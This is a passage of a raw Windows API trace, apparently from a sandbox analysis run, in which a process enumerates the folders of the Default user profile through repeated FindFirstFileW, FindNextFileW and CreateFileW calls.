out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0256.639] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0256.639] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d527734, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0256.639] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0256.639] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x31bfa5a5, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xea64ab63, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xea64ab63, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0256.639] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x31cb9166, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x31cb9166, ftLastAccessTime.dwHighDateTime=0x1d112dc, ftLastWriteTime.dwLowDateTime=0x31cb9166, ftLastWriteTime.dwHighDateTime=0x1d112dc, nFileSizeHigh=0x0, nFileSizeLow=0x9000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0256.639] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x31cb9166, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x31cb9166, ftLastAccessTime.dwHighDateTime=0x1d112dc, ftLastWriteTime.dwLowDateTime=0x31cb9166, ftLastWriteTime.dwHighDateTime=0x1d112dc, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0256.639] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8d5f4e96, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x8d5f4e96, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x8d61ae52, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0256.639] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8d5f4e96, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x8d5f4e96, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x8d61ae52, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0256.639] VirtualAlloc (lpAddress=0x12640000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x12640000 [0256.643] VirtualAlloc (lpAddress=0x110cc000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x110cc000 [0256.644] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8d61ae52, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x8d61ae52, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x8d61ae52, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0256.644] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0256.644] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0256.644] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0256.644] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0256.654] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0256.654] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0256.654] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0256.654] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0256.654] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.654] FindClose (in: hFindFile=0x8fe900 | out: hFindFile=0x8fe900) returned 1 [0256.656] CreateFileW (lpFileName="C:\\\\Users\\Default\\Desktop" (normalized: "c:\\users\\default\\desktop"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.657] FindFirstFileW (in: lpFileName="C:\\\\Users\\Default\\Desktop\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8feb40 [0256.657] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.657] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.657] FindClose (in: hFindFile=0x8feb40 | out: hFindFile=0x8feb40) returned 1 [0256.658] CreateFileW (lpFileName="C:\\\\Users\\Default\\Documents" (normalized: "c:\\users\\default\\documents"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.658] FindFirstFileW (in: lpFileName="C:\\\\Users\\Default\\Documents\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fef80 [0256.663] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.663] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d527734, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0256.663] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d527734, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0256.663] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d527734, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0256.663] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.663] FindClose (in: hFindFile=0x8fef80 | out: hFindFile=0x8fef80) returned 1 [0256.665] CreateFileW (lpFileName="C:\\\\Users\\Default\\Downloads" (normalized: "c:\\users\\default\\downloads"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.665] FindFirstFileW (in: lpFileName="C:\\\\Users\\Default\\Downloads\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fee80 [0256.666] FindNextFileW (in: hFindFile=0x8fee80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.666] FindNextFileW (in: hFindFile=0x8fee80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.666] FindClose (in: hFindFile=0x8fee80 | out: hFindFile=0x8fee80) returned 1 [0256.666] CreateFileW (lpFileName="C:\\\\Users\\Default\\Favorites" (normalized: "c:\\users\\default\\favorites"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.667] FindFirstFileW (in: lpFileName="C:\\\\Users\\Default\\Favorites\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fed80 [0256.667] FindNextFileW (in: hFindFile=0x8fed80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.667] FindNextFileW (in: hFindFile=0x8fed80, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.667] FindClose (in: hFindFile=0x8fed80 | out: hFindFile=0x8fed80) returned 1 [0256.667] CreateFileW (lpFileName="C:\\\\Users\\Default\\Links" (normalized: "c:\\users\\default\\links"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.667] FindFirstFileW (in: lpFileName="C:\\\\Users\\Default\\Links\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fec00 [0256.669] FindNextFileW (in: hFindFile=0x8fec00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.669] FindNextFileW (in: hFindFile=0x8fec00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.669] FindClose (in: hFindFile=0x8fec00 | out: hFindFile=0x8fec00) returned 1 [0256.669] CreateFileW (lpFileName="C:\\\\Users\\Default\\Music" (normalized: "c:\\users\\default\\music"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.669] FindFirstFileW (in: lpFileName="C:\\\\Users\\Default\\Music\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8feb40 [0256.670] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.670] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.670] FindClose (in: hFindFile=0x8feb40 | out: hFindFile=0x8feb40) returned 1 [0256.671] CreateFileW (lpFileName="C:\\\\Users\\Default\\Pictures" (normalized: "c:\\users\\default\\pictures"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.671] FindFirstFileW (in: lpFileName="C:\\\\Users\\Default\\Pictures\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fef40 [0256.672] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.672] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 